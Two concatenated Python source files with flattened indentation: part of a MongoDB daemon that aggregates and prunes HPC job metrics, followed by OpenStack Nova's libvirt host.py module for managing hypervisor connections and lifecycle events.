# if record already exists modify filter query to fetch newer records only
for document in mainCollection.find(filter).sort('Timestamp', 1):
runningDate = datetime.fromtimestamp(document['Timestamp'] / 1000.0)
'''Minute Record Processing'''
if document['Timestamp'] > minutelyLastTimestamp:
# process record for minutely average
# initialize all fields count and sum to 0 if not initialised
if document['NodeId'] not in minutelySum:
minutelySum[document['NodeId']] = {}
minutelyCount[document['NodeId']] = 0
for field in structure:
minutelySum[document['NodeId']][field] = 0
runningMinute = datetime(runningDate.year, runningDate.month, runningDate.day,
runningDate.hour,
runningDate.minute)
if currentMinute == 0:
currentMinute = runningMinute
# insert averageData to minutely collection
if runningMinute != currentMinute:
for node in minutelySum:
                            if minutelyCount[node] != 0:
minuteDoc = {}
minuteDoc['NodeId'] = node
minuteDoc['Timestamp'] = unix_time_millis(currentMinute)
for field in minutelySum[node]:
if structure[field] == 'double':
minuteDoc[field] = minutelySum[node][field] / minutelyCount[node]
else:
minuteDoc[field] = int(minutelySum[node][field] / minutelyCount[node])
try:
minutelyCollection.insert_one(minuteDoc)
except BaseException as e:
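                                    # Likely a duplicate-key error from the unique
                                    # (NodeId, Timestamp) index, meaning this minute was
                                    # already written; ignore and keep processing.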
pass
minutelySum = {}
minutelyCount = {}
minutelySum[document['NodeId']] = {}
minutelyCount[document['NodeId']] = 0
for field in structure:
minutelySum[document['NodeId']][field] = 0
currentMinute = runningMinute
# in either case update minutelyCount and minutely sum
minutelyCount[document['NodeId']] += 1
for field in structure:
if field in document:
minutelySum[document['NodeId']][field] += document[field]
'''Hour Record Processing'''
if not (processMinutely) and document['Timestamp'] > hourlyLastTimestamp:
# process record for hourly average
# initialize all fields count and sum to 0 if not initialised
if document['NodeId'] not in hourlySum:
hourlySum[document['NodeId']] = {}
hourlyCount[document['NodeId']] = 0
for field in structure:
hourlySum[document['NodeId']][field] = 0
runningHour = datetime(runningDate.year, runningDate.month, runningDate.day,
runningDate.hour)
if currentHour == 0:
currentHour = runningHour
# insert averageData to hourly collection
if runningHour != currentHour:
for node in hourlySum:
if hourlyCount[node] != 0:
hourDoc = {}
hourDoc['NodeId'] = node
hourDoc['Timestamp'] = unix_time_millis(currentHour)
for field in hourlySum[node]:
if structure[field] == 'double':
hourDoc[field] = hourlySum[node][field] / hourlyCount[node]
else:
floatAvg = hourlySum[node][field] / hourlyCount[node]
hourDoc[field] = int(floatAvg)
try:
hourlyCollection.insert_one(hourDoc)
except:
pass
hourlySum = {}
hourlyCount = {}
hourlySum[document['NodeId']] = {}
hourlyCount[document['NodeId']] = 0
for field in structure:
hourlySum[document['NodeId']][field] = 0
currentHour = runningHour
# in either case update hourlyCount and hourly sum
hourlyCount[document['NodeId']] += 1
for field in structure:
if field in document:
hourlySum[document['NodeId']][field] += document[field]
'''Daily Record Processing'''
# process record for daily average
# initialize all fields count and sum to 0 if not initialised
if not (processMinutely) and not (processHourly):
if document['NodeId'] not in dailySum:
dailySum[document['NodeId']] = {}
dailyCount[document['NodeId']] = 0
for field in structure:
dailySum[document['NodeId']][field] = 0
runningDay = datetime(runningDate.year, runningDate.month, runningDate.day)
if currentDay == 0:
currentDay = runningDay
# insert averageData to daily collection
if runningDay != currentDay:
for node in dailySum:
if dailyCount[node] != 0:
dayDoc = {}
dayDoc['NodeId'] = node
dayDoc['Timestamp'] = unix_time_millis(currentDay)
for field in dailySum[node]:
if structure[field] == 'double':
dayDoc[field] = dailySum[node][field] / dailyCount[node]
else:
dayDoc[field] = int(dailySum[node][field] / dailyCount[node])
try:
dailyCollection.insert_one(dayDoc)
except:
pass
dailySum = {}
dailyCount = {}
dailySum[document['NodeId']] = {}
dailyCount[document['NodeId']] = 0
for field in structure:
dailySum[document['NodeId']][field] = 0
currentDay = runningDay
# in either case update dailyCount and daily sum
dailyCount[document['NodeId']] += 1
for field in structure:
if field in document:
dailySum[document['NodeId']][field] += document[field]
# if counter % 100 != 0:
# bulkUpdateMinutelyCollection.execute()
except BaseException as e:
logging.error(datetime.now().strftime('%Y-%m-%d %H:%M:%S') + " : " + str(e))
finally:
childClient.close()
time.sleep(90)
# 2. Check what metrics exist for all jobs and add a field 'metrices' to the job collection
def jobMetricsChecker():
while True:
client = None
try:
client = MongoClient(MONGO_DB_URL)
db = client[DATABASE_NAME]
metricesNames = []
schemaCollection = db.schema
# get all metrics name from schema
metricSchemas = schemaCollection.find({'type': 'metrics'})
for metric in metricSchemas:
metricesNames.append(metric['name'])
jobCollection = db.job
for document in jobCollection.find(
{'$and': [{"metrices": {'$exists': False}}, {"end_time": {'$exists': True}},
{"end_time": {'$gt': 0}}]}).sort('_id', 1):
existingMetrics = []
                # process job only if its start_time is greater than 0
if document['start_time'] > 0:
# for each metric check if metrics data exists for current job
start_time_milli = document['start_time'] * 1000
                    end_time_milli = document['end_time'] * 1000 if document['end_time'] != 0 else 3165539199849  # milliseconds for year 2070
for metric in metricesNames:
if db[metric].find_one({'Timestamp': {'$gte': start_time_milli, '$lte': end_time_milli}}):
existingMetrics.append(metric)
for dyn_metric in db.dynamic_schema.find({"Jobid": document['_id']}, {"name": 1}):
existingMetrics.append(dyn_metric['name'])
# update job by adding/updating metrices field
jobCollection.update_one({'_id': document['_id']}, {'$set': {'metrices': existingMetrics}},
upsert=False)
except BaseException as e:
logging.error(datetime.now().strftime('%Y-%m-%d %H:%M:%S') + " : " + str(e))
finally:
client.close()
time.sleep(90)
# 3. Clear old data
def deleteOldData():
while True:
client = None
try:
client = MongoClient(MONGO_DB_URL)
db = client[DATABASE_NAME]
schemaCollection = db.schema
# get all metrics name from schema
metricSchemas = schemaCollection.find({'type': 'metrics'})
for metric in metricSchemas:
metricMainCollection = db[metric['name']]
metricMinutelyCollection = db[metric['name'] + '.minutely']
metricHourlyCollection = db[metric['name'] + '.hourly']
# Get timestamp for 90 days ago (for main collection)
timeBefore90 = unix_time_millis(datetime.now() - timedelta(days=90))
# delete documents older than 90 days for main collection
metricMainCollection.delete_many({"Timestamp": {'$lte': timeBefore90}})
# Get timestamp for 180 days ago (for minutely collection)
timeBefore180 = unix_time_millis(datetime.now() - timedelta(days=180))
# delete documents older than 180 days for minutely collection
metricMinutelyCollection.delete_many({"Timestamp": {'$lte': timeBefore180}})
# Get timestamp for 365 days ago (for hourly collection)
timeBefore365 = unix_time_millis(datetime.now() - timedelta(days=365))
# delete documents older than 365 days for hourly collection
metricHourlyCollection.delete_many({"Timestamp": {'$lte': timeBefore365}})
except BaseException as e:
logging.error(datetime.now().strftime('%Y-%m-%d %H:%M:%S') + " : " + str(e))
finally:
client.close()
        time.sleep(300 * 60)  # sleep 5 hours
# 4.1 Create Overview for SPAPI
def processSpapiOverview(schemaName):
while True:
childClient = None
try:
childClient = MongoClient(MONGO_DB_URL)
db = childClient[DATABASE_NAME]
            # Use this process's own connection; hpcDB is the parent process's
            # handle and is closed before the workers are forked.
            dynamicSchemaCollection = db.dynamic_schema
db[schemaName].create_index([('Jobid', pymongo.ASCENDING)], background=True)
allJobMetrics = dynamicSchemaCollection.find(
{'$and': [{'name': schemaName}, {'processedOverview': {'$exists': False}}]}).sort(
'_id', 1)
for jobMetric in allJobMetrics:
if 'processedOverview' in jobMetric:
continue
breakLoop = False
for job in db.job.find({'_id': jobMetric['Jobid']}):
                    if not ('end_time' in job and job['end_time'] != 0 and job['end_time'] != ""):
breakLoop = True
if breakLoop:
break
metricFields = jobMetric['structure']
for metric in metricFields:
aggregateResult = db[schemaName].aggregate([
{
'$match': {'Jobid': jobMetric['Jobid']}
},
{
'$group': {
'_id': {'Jobid': '$Jobid', 'NodeId': '$NodeId', 'ProcessId': '$ProcessId'},
'avg': {'$avg': '$' + metric},
'min': {'$first': '$' + metric},
'max': {'$last': '$' + metric}
}
},
{
'$project': {
'_id': '$_id',
'' + metric: {'avg': '$avg', 'min': '$min', 'max': '$max'}
}
}
])
for record in aggregateResult:
db[schemaName + '.overview'].update_one({
'_id': record['_id']
}, {
'$set': {
metric + '': record[metric]
}
}, upsert=True)
'''update dynamic_schema'''
try:
dynamicSchemaCollection.update_one({"$and": [{"name": schemaName}, {"Jobid": jobMetric['Jobid']}]},
{'$set': {'processedOverview': True}})
except BaseException as e:
pass
except BaseException as e:
logging.error(datetime.now().strftime('%Y-%m-%d %H:%M:%S') + " : " + str(e))
finally:
childClient.close()
time.sleep(90)
# 4.2 Averages For SPAPI
def processSpapiCollection(schemaName):
while True:
childClient = None
try:
childClient = MongoClient(MONGO_DB_URL)
db = childClient[DATABASE_NAME]
mainCollection = db[schemaName]
minutelyCollection = db[schemaName + '.minutely']
hourlyCollection = db[schemaName + '.hourly']
            # Make sure these indexes exist for faster querying
minutelyCollection.create_index(
[('Jobid', pymongo.ASCENDING), ('NodeId', pymongo.ASCENDING), ('ProcessId', pymongo.ASCENDING),
('Timestamp', pymongo.ASCENDING)],
background=True,
unique=True)
minutelyCollection.create_index([('Timestamp', pymongo.ASCENDING)])
hourlyCollection.create_index(
[('Jobid', pymongo.ASCENDING), ('NodeId', pymongo.ASCENDING), ('ProcessId', pymongo.ASCENDING),
('Timestamp', pymongo.ASCENDING)],
background=True,
unique=True)
hourlyCollection.create_index([('Timestamp', pymongo.ASCENDING)])
mainCollection.create_index([('Jobid', pymongo.ASCENDING)], background=True)
mainCollection.create_index([('Timestamp', pymongo.ASCENDING)], background=True)
            # Use this process's own connection; hpcDB is the parent process's
            # handle and is closed before the workers are forked.
            dynamicSchemaCollection = db.dynamic_schema
allJobMetrics = dynamicSchemaCollection.find(
{'$and': [{'name': schemaName}, {'processedMax': {'$exists': False}}]}).sort(
'_id', 1)
for jobMetric in allJobMetrics:
if 'processedMax' in jobMetric:
continue
metricFields = jobMetric['structure']
for metric in metricFields:
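                    # Timestamp is stored as epoch milliseconds; $add-ing it to
                    # EPOCH_BEGIN_DATETIME produces a BSON date, which lets the
                    # $year/$month/$dayOfMonth/$hour/$minute operators below bucket
                    # records per minute (keeping the last sample of each bucket).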
aggregateResultMinutely = db[schemaName].aggregate([
{
'$match': {'Jobid': jobMetric['Jobid']}
},
{
"$group": {
"_id": {
"year": {"$year": {"$add": [EPOCH_BEGIN_DATETIME, "$Timestamp"]}},
"month": {"$month": {"$add": [EPOCH_BEGIN_DATETIME, "$Timestamp"]}},
"day": {"$dayOfMonth": {"$add": [EPOCH_BEGIN_DATETIME, "$Timestamp"]}},
"hour": {"$hour": {"$add": [EPOCH_BEGIN_DATETIME, "$Timestamp"]}},
"minute": {"$minute": {"$add": [EPOCH_BEGIN_DATETIME, "$Timestamp"]}},
"Jobid": "$Jobid",
"NodeId": "$NodeId",
"ProcessId": "$ProcessId"
},
"Timestamp": {"$last": "$Timestamp"},
"" + metric: {"$last": "$" + metric}
}
},
{
'$project': {
'Timestamp': "$Timestamp",
'' + metric: "$" + metric
}
}
])
bulkopMinutely = db[schemaName + '.minutely'].initialize_ordered_bulk_op()
bulkTracker = 0
for record in aggregateResultMinutely:
bulkopMinutely.find({
'_id': record['_id']
}).upsert().update({
'$set': {
'Timestamp': record['Timestamp'],
'Jobid': record['_id']['Jobid'],
'NodeId': record['_id']['NodeId'],
'ProcessId': record['_id']['ProcessId'],
metric + '': record[metric],
}
})
bulkTracker += 1
if bulkTracker >= 500:
bulkopMinutely.execute()
bulkTracker = 0
bulkopMinutely = db[schemaName + '.minutely'].initialize_ordered_bulk_op()
# check for remaining bulk operations
if bulkTracker > 0:
bulkopMinutely.execute()
for metric in metricFields:
aggregateResultHourly = db[schemaName + '.minutely'].aggregate([
{
'$match': {'Jobid': jobMetric['Jobid']}
},
{
"$group": {
"_id": {
"year": "$_id.year",
"month": "$_id.month",
"day": "$_id.day",
"hour": "$_id.hour",
"Jobid": "$Jobid",
"NodeId": "$NodeId",
"ProcessId": "$ProcessId"
},
"Timestamp": {"$last": "$Timestamp"},
"" + metric: {"$last": "$" + metric}
}
},
{
'$project': {
'Timestamp': "$Timestamp",
'' + metric: "$" + metric
}
}
])
bulkopHourly = db[schemaName + '.hourly'].initialize_ordered_bulk_op()
bulkTracker = 0
for record in aggregateResultHourly:
bulkopHourly.find({
'_id': record['_id']
}).upsert().update({
'$set': {
'Timestamp': record['Timestamp'],
'Jobid': record['_id']['Jobid'],
'NodeId': record['_id']['NodeId'],
'ProcessId': record['_id']['ProcessId'],
metric + '': record[metric]
}
})
bulkTracker += 1
if bulkTracker >= 500:
bulkopHourly.execute()
bulkTracker = 0
bulkopHourly = db[schemaName + '.hourly'].initialize_ordered_bulk_op()
# check for remaining bulk operations
if bulkTracker > 0:
bulkopHourly.execute()
'''update dynamic_schema'''
try:
dynamicSchemaCollection.update_one({"$and": [{"name": schemaName}, {"Jobid": jobMetric['Jobid']}]},
{'$set': {'processedMax': True}})
except BaseException as e:
pass
except BaseException as e:
logging.error(datetime.now().strftime('%Y-%m-%d %H:%M:%S') + " : " + str(e))
finally:
childClient.close()
time.sleep(90)
# Main driver: spawn worker processes for every metric and restart any that die
if __name__ == '__main__':
    # Process each metric separately in its own worker process
metricProcesses = {}
dynamicMetricProcesses = {}
jobProcess = None
clearOldProcess = None
parentClient = None
while True:
parentClient = None
schema = {}
dynamic_schema = []
try:
            # connect to mongodb and get metric names from the schema collection
parentClient = MongoClient(MONGO_DB_URL)
hpcDB = parentClient[DATABASE_NAME]
schemaCollection = hpcDB.schema
metricSchemas = schemaCollection.find({'type': 'metrics'})
for metric in metricSchemas:
structure = metric['structure']
for key in metric['non_metric_fields']:
structure.pop(key, None)
schema[metric['name']] = structure
dynamicSchemaCollection = hpcDB.dynamic_schema
dynamicSchemas = dynamicSchemaCollection.distinct("name")
for dynamicSchema in dynamicSchemas:
dynamic_schema.append(dynamicSchema)
# Close mongoclient before forking to subprocess
parentClient.close()
# 1. Create processes for all metrics in schema collection (to calculate periodic averages)
for metric in schema:
                # (re)start the worker if no process exists for this metric or it has died
if metric not in metricProcesses or (not (metricProcesses[metric].is_alive())):
metricProcesses[metric] = mp.Process(target=processCollection, args=(metric, schema[metric]))
metricProcesses[metric].start()
# 2. Create process to check what metrics exist for all jobs
if jobProcess is None or (not (jobProcess.is_alive())):
jobProcess = mp.Process(target=jobMetricsChecker)
jobProcess.start()
# 3. Create process to clear the old data
if clearOldProcess is None or (not (clearOldProcess.is_alive())):
clearOldProcess = mp.Process(target=deleteOldData)
clearOldProcess.start()
# 4. Create processes for metrics in dynamic_schema collection
for schemaName in dynamic_schema:
if schemaName == 'spapi':
if schemaName + ".overview" not in dynamicMetricProcesses or (
not (dynamicMetricProcesses[schemaName + ".overview"].is_alive())):
dynamicMetricProcesses[schemaName + ".overview"] = mp.Process(target=processSpapiOverview,
args=(schemaName,))
dynamicMetricProcesses[schemaName + ".overview"].start()
if schemaName not in dynamicMetricProcesses or (
not (dynamicMetricProcesses[schemaName].is_alive())):
dynamicMetricProcesses[schemaName] = mp.Process(target=processSpapiCollection,
args=(schemaName,))
dynamicMetricProcesses[schemaName].start()
except BaseException as e:
logging.error(datetime.now().strftime('%Y-%m-%d %H:%M:%S') + " : " + str(e))
finally:
time.sleep(60 * 10) # sleep 10 minutes
|
host.py | # Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright (c) 2010 Citrix Systems, Inc.
# Copyright (c) 2011 Piston Cloud Computing, Inc
# Copyright (c) 2012 University Of Minho
# (c) Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Manages information about the host OS and hypervisor.
This class encapsulates a connection to the libvirt
daemon and provides certain higher level APIs around
the raw libvirt API. These APIs are then used by all
the other libvirt related classes
"""
from collections import defaultdict
import inspect
import operator
import os
import socket
import threading
import traceback
from eventlet import greenio
from eventlet import greenthread
from eventlet import patcher
from eventlet import tpool
from oslo_log import log as logging
from oslo_utils import encodeutils
from oslo_utils import excutils
from oslo_utils import importutils
from oslo_utils import units
from oslo_utils import versionutils
import six
from nova.compute import utils as compute_utils
import nova.conf
from nova import context as nova_context
from nova import exception
from nova.i18n import _
from nova import rpc
from nova import utils
from nova.virt import event as virtevent
from nova.virt.libvirt import config as vconfig
from nova.virt.libvirt import guest as libvirt_guest
from nova.virt.libvirt import migration as libvirt_migrate
from nova.virt.libvirt import utils as libvirt_utils
libvirt = None
LOG = logging.getLogger(__name__)
native_socket = patcher.original('socket')
native_threading = patcher.original("threading")
native_Queue = patcher.original("Queue" if six.PY2 else "queue")
CONF = nova.conf.CONF
# This list is for libvirt hypervisor drivers that need special handling.
# This is *not* the complete list of supported hypervisor drivers.
HV_DRIVER_QEMU = "QEMU"
HV_DRIVER_XEN = "Xen"
SEV_KERNEL_PARAM_FILE = '/sys/module/kvm_amd/parameters/sev'
class Host(object):
def __init__(self, uri, read_only=False,
conn_event_handler=None,
lifecycle_event_handler=None):
global libvirt
if libvirt is None:
libvirt = importutils.import_module('libvirt')
self._uri = uri
self._read_only = read_only
self._initial_connection = True
self._conn_event_handler = conn_event_handler
self._conn_event_handler_queue = six.moves.queue.Queue()
self._lifecycle_event_handler = lifecycle_event_handler
self._caps = None
self._domain_caps = None
self._hostname = None
self._wrapped_conn = None
self._wrapped_conn_lock = threading.Lock()
self._event_queue = None
self._events_delayed = {}
# Note(toabctl): During a reboot of a domain, STOPPED and
# STARTED events are sent. To prevent shutting
# down the domain during a reboot, delay the
# STOPPED lifecycle event some seconds.
self._lifecycle_delay = 15
self._initialized = False
self._libvirt_proxy_classes = self._get_libvirt_proxy_classes(libvirt)
self._libvirt_proxy = self._wrap_libvirt_proxy(libvirt)
# AMD SEV is conditional on support in the hardware, kernel,
# qemu, and libvirt. This is determined on demand and
# memoized by the supports_amd_sev property below.
self._supports_amd_sev = None
self._has_hyperthreading = None
@staticmethod
def _get_libvirt_proxy_classes(libvirt_module):
"""Return a tuple for tpool.Proxy's autowrap argument containing all
classes defined by the libvirt module except libvirtError.
"""
# Get a list of (name, class) tuples of libvirt classes
classes = inspect.getmembers(libvirt_module, inspect.isclass)
        # Return a tuple of just the classes, filtering out libvirtError because
        # we don't need to proxy that
return tuple([cls[1] for cls in classes if cls[0] != 'libvirtError'])
def _wrap_libvirt_proxy(self, obj):
"""Return an object wrapped in a tpool.Proxy using autowrap appropriate
for the libvirt module.
"""
# libvirt is not pure python, so eventlet monkey patching doesn't work
# on it. Consequently long-running libvirt calls will not yield to
# eventlet's event loop, starving all other greenthreads until
# completion. eventlet's tpool.Proxy handles this situation for us by
# executing proxied calls in a native thread.
return tpool.Proxy(obj, autowrap=self._libvirt_proxy_classes)
def _native_thread(self):
"""Receives async events coming in from libvirtd.
This is a native thread which runs the default
libvirt event loop implementation. This processes
any incoming async events from libvirtd and queues
them for later dispatch. This thread is only
permitted to use libvirt python APIs, and the
driver.queue_event method. In particular any use
of logging is forbidden, since it will confuse
eventlet's greenthread integration
"""
while True:
libvirt.virEventRunDefaultImpl()
def _dispatch_thread(self):
"""Dispatches async events coming in from libvirtd.
This is a green thread which waits for events to
arrive from the libvirt event loop thread. This
then dispatches the events to the compute manager.
"""
while True:
self._dispatch_events()
def _conn_event_thread(self):
"""Dispatches async connection events"""
# NOTE(mdbooth): This thread doesn't need to jump through the same
# hoops as _dispatch_thread because it doesn't interact directly
# with the libvirt native thread.
while True:
self._dispatch_conn_event()
def _dispatch_conn_event(self):
# NOTE(mdbooth): Splitting out this loop looks redundant, but it
# means we can easily dispatch events synchronously from tests and
# it isn't completely awful.
handler = self._conn_event_handler_queue.get()
try:
handler()
except Exception:
LOG.exception(_('Exception handling connection event'))
finally:
self._conn_event_handler_queue.task_done()
@staticmethod
def _event_lifecycle_callback(conn, dom, event, detail, opaque):
"""Receives lifecycle events from libvirt.
NB: this method is executing in a native thread, not
an eventlet coroutine. It can only invoke other libvirt
APIs, or use self._queue_event(). Any use of logging APIs
in particular is forbidden.
"""
self = opaque
uuid = dom.UUIDString()
transition = None
if event == libvirt.VIR_DOMAIN_EVENT_STOPPED:
transition = virtevent.EVENT_LIFECYCLE_STOPPED
elif event == libvirt.VIR_DOMAIN_EVENT_STARTED:
transition = virtevent.EVENT_LIFECYCLE_STARTED
elif event == libvirt.VIR_DOMAIN_EVENT_SUSPENDED:
if detail == libvirt.VIR_DOMAIN_EVENT_SUSPENDED_POSTCOPY:
transition = virtevent.EVENT_LIFECYCLE_POSTCOPY_STARTED
elif detail == libvirt.VIR_DOMAIN_EVENT_SUSPENDED_MIGRATED:
# VIR_DOMAIN_EVENT_SUSPENDED_MIGRATED is also sent when live
# migration of the guest fails, so we cannot simply rely
# on the event itself but need to check if the job itself was
# successful.
# NOTE(mriedem): The job check logic here is copied from
# LibvirtDriver._live_migration_monitor.
guest = libvirt_guest.Guest(dom)
info = guest.get_job_info()
if info.type == libvirt.VIR_DOMAIN_JOB_NONE:
# Either still running, or failed or completed,
# lets untangle the mess.
info.type = libvirt_migrate.find_job_type(
guest, instance=None, logging_ok=False)
if info.type == libvirt.VIR_DOMAIN_JOB_COMPLETED:
transition = virtevent.EVENT_LIFECYCLE_MIGRATION_COMPLETED
else:
# Failed or some other status we don't know about, so just
# opt to report the guest is paused.
transition = virtevent.EVENT_LIFECYCLE_PAUSED
else:
transition = virtevent.EVENT_LIFECYCLE_PAUSED
elif event == libvirt.VIR_DOMAIN_EVENT_RESUMED:
transition = virtevent.EVENT_LIFECYCLE_RESUMED
if transition is not None:
self._queue_event(virtevent.LifecycleEvent(uuid, transition))
def _close_callback(self, conn, reason, opaque):
close_info = {'conn': conn, 'reason': reason}
self._queue_event(close_info)
@staticmethod
def _test_connection(conn):
try:
conn.getLibVersion()
return True
except libvirt.libvirtError as e:
if (e.get_error_code() in (libvirt.VIR_ERR_SYSTEM_ERROR,
libvirt.VIR_ERR_INTERNAL_ERROR) and
e.get_error_domain() in (libvirt.VIR_FROM_REMOTE,
libvirt.VIR_FROM_RPC)):
LOG.debug('Connection to libvirt broke')
return False
raise
@staticmethod
def _connect_auth_cb(creds, opaque):
if len(creds) == 0:
return 0
raise exception.InternalError(
_("Can not handle authentication request for %d credentials")
% len(creds))
def _connect(self, uri, read_only):
auth = [[libvirt.VIR_CRED_AUTHNAME,
libvirt.VIR_CRED_ECHOPROMPT,
libvirt.VIR_CRED_REALM,
libvirt.VIR_CRED_PASSPHRASE,
libvirt.VIR_CRED_NOECHOPROMPT,
libvirt.VIR_CRED_EXTERNAL],
Host._connect_auth_cb,
None]
flags = 0
if read_only:
flags = libvirt.VIR_CONNECT_RO
return self._libvirt_proxy.openAuth(uri, auth, flags)
def _queue_event(self, event):
"""Puts an event on the queue for dispatch.
This method is called by the native event thread to
put events on the queue for later dispatch by the
green thread. Any use of logging APIs is forbidden.
"""
if self._event_queue is None:
return
# Queue the event...
self._event_queue.put(event)
# ...then wakeup the green thread to dispatch it
c = ' '.encode()
self._event_notify_send.write(c)
self._event_notify_send.flush()
def _dispatch_events(self):
"""Wait for & dispatch events from native thread
Blocks until native thread indicates some events
are ready. Then dispatches all queued events.
"""
# Wait to be notified that there are some
# events pending
try:
_c = self._event_notify_recv.read(1)
assert _c
except ValueError:
return # will be raised when pipe is closed
# Process as many events as possible without
# blocking
last_close_event = None
while not self._event_queue.empty():
try:
event = self._event_queue.get(block=False)
if isinstance(event, virtevent.LifecycleEvent):
# call possibly with delay
self._event_emit_delayed(event)
elif 'conn' in event and 'reason' in event:
last_close_event = event
except native_Queue.Empty:
pass
if last_close_event is None:
return
conn = last_close_event['conn']
# get_new_connection may already have disabled the host,
# in which case _wrapped_conn is None.
with self._wrapped_conn_lock:
if conn == self._wrapped_conn:
reason = str(last_close_event['reason'])
msg = _("Connection to libvirt lost: %s") % reason
self._wrapped_conn = None
self._queue_conn_event_handler(False, msg)
def _event_emit_delayed(self, event):
"""Emit events - possibly delayed."""
def event_cleanup(gt, *args, **kwargs):
"""Callback function for greenthread. Called
to cleanup the _events_delayed dictionary when an event
was called.
"""
event = args[0]
self._events_delayed.pop(event.uuid, None)
# Cleanup possible delayed stop events.
        if event.uuid in self._events_delayed:
self._events_delayed[event.uuid].cancel()
self._events_delayed.pop(event.uuid, None)
LOG.debug("Removed pending event for %s due to "
"lifecycle event", event.uuid)
if event.transition == virtevent.EVENT_LIFECYCLE_STOPPED:
# Delay STOPPED event, as they may be followed by a STARTED
# event in case the instance is rebooting
id_ = greenthread.spawn_after(self._lifecycle_delay,
self._event_emit, event)
self._events_delayed[event.uuid] = id_
# add callback to cleanup self._events_delayed dict after
# event was called
id_.link(event_cleanup, event)
else:
self._event_emit(event)
def _event_emit(self, event):
if self._lifecycle_event_handler is not None:
self._lifecycle_event_handler(event)
def _init_events_pipe(self):
"""Create a self-pipe for the native thread to synchronize on.
This code is taken from the eventlet tpool module, under terms
of the Apache License v2.0.
"""
self._event_queue = native_Queue.Queue()
try:
rpipe, wpipe = os.pipe()
self._event_notify_send = greenio.GreenPipe(wpipe, 'wb', 0)
self._event_notify_recv = greenio.GreenPipe(rpipe, 'rb', 0)
except (ImportError, NotImplementedError):
# This is Windows compatibility -- use a socket instead
# of a pipe because pipes don't really exist on Windows.
sock = native_socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('localhost', 0))
sock.listen(50)
csock = native_socket.socket(socket.AF_INET, socket.SOCK_STREAM)
csock.connect(('localhost', sock.getsockname()[1]))
nsock, addr = sock.accept()
self._event_notify_send = nsock.makefile('wb', 0)
gsock = greenio.GreenSocket(csock)
self._event_notify_recv = gsock.makefile('rb', 0)
def _init_events(self):
"""Initializes the libvirt events subsystem.
This requires running a native thread to provide the
libvirt event loop integration. This forwards events
to a green thread which does the actual dispatching.
"""
self._init_events_pipe()
LOG.debug("Starting native event thread")
self._event_thread = native_threading.Thread(
target=self._native_thread)
self._event_thread.setDaemon(True)
self._event_thread.start()
LOG.debug("Starting green dispatch thread")
utils.spawn(self._dispatch_thread)
def _get_new_connection(self):
# call with _wrapped_conn_lock held
LOG.debug('Connecting to libvirt: %s', self._uri)
# This will raise an exception on failure
wrapped_conn = self._connect(self._uri, self._read_only)
try:
LOG.debug("Registering for lifecycle events %s", self)
wrapped_conn.domainEventRegisterAny(
None,
libvirt.VIR_DOMAIN_EVENT_ID_LIFECYCLE,
self._event_lifecycle_callback,
self)
except Exception as e:
LOG.warning("URI %(uri)s does not support events: %(error)s",
{'uri': self._uri, 'error': e})
try:
LOG.debug("Registering for connection events: %s", str(self))
wrapped_conn.registerCloseCallback(self._close_callback, None)
except libvirt.libvirtError as e:
LOG.warning("URI %(uri)s does not support connection"
" events: %(error)s",
{'uri': self._uri, 'error': e})
return wrapped_conn
def _queue_conn_event_handler(self, *args, **kwargs):
if self._conn_event_handler is None:
return
def handler():
return self._conn_event_handler(*args, **kwargs)
self._conn_event_handler_queue.put(handler)
def _get_connection(self):
# multiple concurrent connections are protected by _wrapped_conn_lock
with self._wrapped_conn_lock:
# Drop the existing connection if it is not usable
if (self._wrapped_conn is not None and
not self._test_connection(self._wrapped_conn)):
self._wrapped_conn = None
# Connection was previously up, and went down
self._queue_conn_event_handler(
False, _('Connection to libvirt lost'))
if self._wrapped_conn is None:
try:
# This will raise if it fails to get a connection
self._wrapped_conn = self._get_new_connection()
except Exception as ex:
with excutils.save_and_reraise_exception():
# If we previously had a connection and it went down,
# we generated a down event for that above.
# We also want to generate a down event for an initial
# failure, which won't be handled above.
if self._initial_connection:
self._queue_conn_event_handler(
False,
_('Failed to connect to libvirt: %(msg)s') %
{'msg': ex})
finally:
self._initial_connection = False
self._queue_conn_event_handler(True, None)
return self._wrapped_conn
def get_connection(self):
"""Returns a connection to the hypervisor
This method should be used to create and return a well
configured connection to the hypervisor.
:returns: a libvirt.virConnect object
"""
try:
conn = self._get_connection()
except libvirt.libvirtError as ex:
LOG.exception(_("Connection to libvirt failed: %s"), ex)
payload = dict(ip=CONF.my_ip,
method='_connect',
reason=ex)
ctxt = nova_context.get_admin_context()
rpc.get_notifier('compute').error(ctxt,
'compute.libvirt.error',
payload)
compute_utils.notify_about_libvirt_connect_error(
ctxt, ip=CONF.my_ip, exception=ex, tb=traceback.format_exc())
raise exception.HypervisorUnavailable()
return conn
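# A minimal usage sketch (hypothetical; assumes this Host object was
# constructed with a libvirt URI such as 'qemu:///system'):
#
#     host.initialize()
#     conn = host.get_connection()
#     print(conn.getHostname())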
@staticmethod
def _libvirt_error_handler(context, err):
# Just ignore instead of default outputting to stderr.
pass
def initialize(self):
if self._initialized:
return
# NOTE(dkliban): Error handler needs to be registered before libvirt
# connection is used for the first time. Otherwise, the
# handler does not get registered.
libvirt.registerErrorHandler(self._libvirt_error_handler, None)
libvirt.virEventRegisterDefaultImpl()
self._init_events()
LOG.debug("Starting connection event dispatch thread")
utils.spawn(self._conn_event_thread)
self._initialized = True
def _version_check(self, lv_ver=None, hv_ver=None, hv_type=None,
op=operator.lt):
"""Check libvirt version, hypervisor version, and hypervisor type
:param hv_type: hypervisor driver from the top of this file.
"""
conn = self.get_connection()
try:
if lv_ver is not None:
libvirt_version = conn.getLibVersion()
if op(libvirt_version,
versionutils.convert_version_to_int(lv_ver)):
return False
if hv_ver is not None:
hypervisor_version = conn.getVersion()
if op(hypervisor_version,
versionutils.convert_version_to_int(hv_ver)):
return False
if hv_type is not None:
hypervisor_type = conn.getType()
if hypervisor_type != hv_type:
return False
return True
except Exception:
return False
def has_min_version(self, lv_ver=None, hv_ver=None, hv_type=None):
return self._version_check(
lv_ver=lv_ver, hv_ver=hv_ver, hv_type=hv_type, op=operator.lt)
